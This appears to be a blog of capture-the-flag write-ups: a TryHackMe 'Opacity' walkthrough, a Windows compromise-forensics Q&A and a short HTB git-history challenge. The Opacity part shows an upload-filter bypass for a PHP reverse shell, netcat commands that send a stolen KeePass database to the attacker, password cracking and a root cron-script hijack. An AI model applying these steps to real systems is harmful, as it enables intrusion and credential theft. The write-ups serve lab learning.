Tuesday, April 25, 2023

THM - Opacity


Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 11:11 BST

Nmap scan report for

Host is up (0.022s latency).

Not shown: 65531 closed tcp ports (conn-refused)

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_ 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-25T10:11:28
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds

Port 80 open with Apache 2.4.41 running
SMB running

Login box at port 80

More enumeration!

└─$ smbclient -L \\\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))

not much without authentication for SMB

└─$ smbmap -H
[+] IP: Name:
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
START_TIME: Tue Apr 25 11:30:03 2023

WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
---- Scanning URL: ----

The cloud directory looks interesting!

We can try to upload things!


Whilst dirb was running in the background it also found , at an assumption this is where the uploaded images are stored.

I hosted a server and tried to upload a shell using https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php . It didn't like this as it had to be an image.

I tried with just a space and then the .jpg, didn't work, using a null character #.jpg worked and we had a shell.. for a time. The 5 minutes file upload meant you only have 5 minutes until the files are deleted.

$ ls
$ whoami
$ cd home
$ ls
$ cd sysadmin
$ ls
$ cat local.txt
cat: local.txt: Permission denied

We have a second user, sysadmin, we want this one!

www-data doesn't have much access, there is a scripts folder but we don't have permissions for that, but we do have access to opt and there is an interesting file in there called dataset.kdbx. A kdbx file is a keepass database, we want this!

After some hunting I found we can transfer files using netcat (nc). To do this, on the destination host (our attack box) we want to listen for the file

Example: nc -l -p 7555 > myfile.txt
nc -lnvp 4446 > dataset.kdbx

On the source host (victim) we send the file:
nc 7555 < myfile.txt
nc 4446 < dataset.kdbx

We now have the file! Let's crack it.

Following the guide from https://www.thedutchhacker.com/how-to-crack-a-keepass-database-file/ we can pull out the hash using keepass2john and then crack the password.

keepass2john dataset.kdbx > hash.txt

Take the cracked password, open the database, get the new creds.

Remember, SSH is open, let's go get our first flag!


Now we're on the machine without a time limit we can take a breath and think of the next step. Under the sysadmin there is a script.php which is the script used to delete the files found within the images folder.. this does run every 5 minutes and could be useful. There are a bunch of php files under the lib directory.

sysadmin@opacity:~/scripts$ ls -lha
total 16K
drwxr-xr-x 3 root root 4.0K Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4.0K Feb 22 08:16 ..
drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php

Hello... the script is owned by root... but we can't edit :(

After a little, okay a lot, of thinking, we know root is running the script, we know there is a job to run the script.php from the scripts folder. What if we just make a new script which is a reverse shell? Let's give it ago, using the same script as before we can load that into a new scripts folder (moving/renaming the old one) call it script.php, set up the listener and wait....

Boom, it worked! From here we can get the final flag!

Really fun machine this one, luckily my brain has a small capacity and I totally forgot about SMB which wasn't required. The folder being cleared out stumped me for a while until the penny dropped and getting root being as simple as it was tripped me!

Monday, April 24, 2023

THM - Investigating Windows


This is a challenge that is exactly what is says on the tin, there are a few challenges around investigating a windows machine that has been previously compromised.


Whats the version and year of the windows machine?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Which user logged in last?
Get-LocalUser | Select Name, Lastlogon

When did John log onto the system last?
We can get that info from our last command

What IP does the system connect to when it first starts?
There will be a cmd pop up upon system login with the IP

What two accounts had administrative privileges (other than the Administrator user)?
net localgroup administrators

Whats the name of the scheduled task that is malicious.
Check the scheduled tasks, there will be a few obvious ones which stick out! Check the actions of each.

What file was the task trying to run daily?
Found under the actions of the malicious task.

What port did this file listen locally for?
Found under the actions of the malicious task.

When did Jenny last logon?
We can use
Get-LocalUser | Select Name, Lastlogon
Check the Security Log in EventViewer and filter for Jenny and EID 4624

At what date did the compromise take place?
Something was created for persistence, when?

At what time did Windows first assign special privileges to a new logon?
Search EID 4672 under the security log.

What tool was used to get Windows passwords?
We can find that within the TMP folder the attackers created.

What was the attackers external control and command servers IP?
Check the hosts file for any potential changes made by the attacker

What was the extension name of the shell uploaded via the servers website?
Check wwwroot

What was the last port the attacker opened?
Check the firewall rules for inbound, there are a few suspicious ports being opened to allow inbound connectivity.

Check for DNS poisoning, what site was targeted?
We found this within the hosts file.

Wednesday, April 5, 2023

HTB - Illumination

Initial Investigation & Solution

We can actually find the problem upon unzipping the challenge.

We see immediately that there is a .git folder along with what looks to be the log file!

Using git to read the log.

A token was removed as a security precaution, dig a little deeper and view the change.


There is the token! Looks to be base64 so simply decode and we have our flag!


THM - Windows Forensics 1

Scenario One of the Desktops in the research lab at Organization X is  suspected to have been accessed by someone unauthorized. Although the...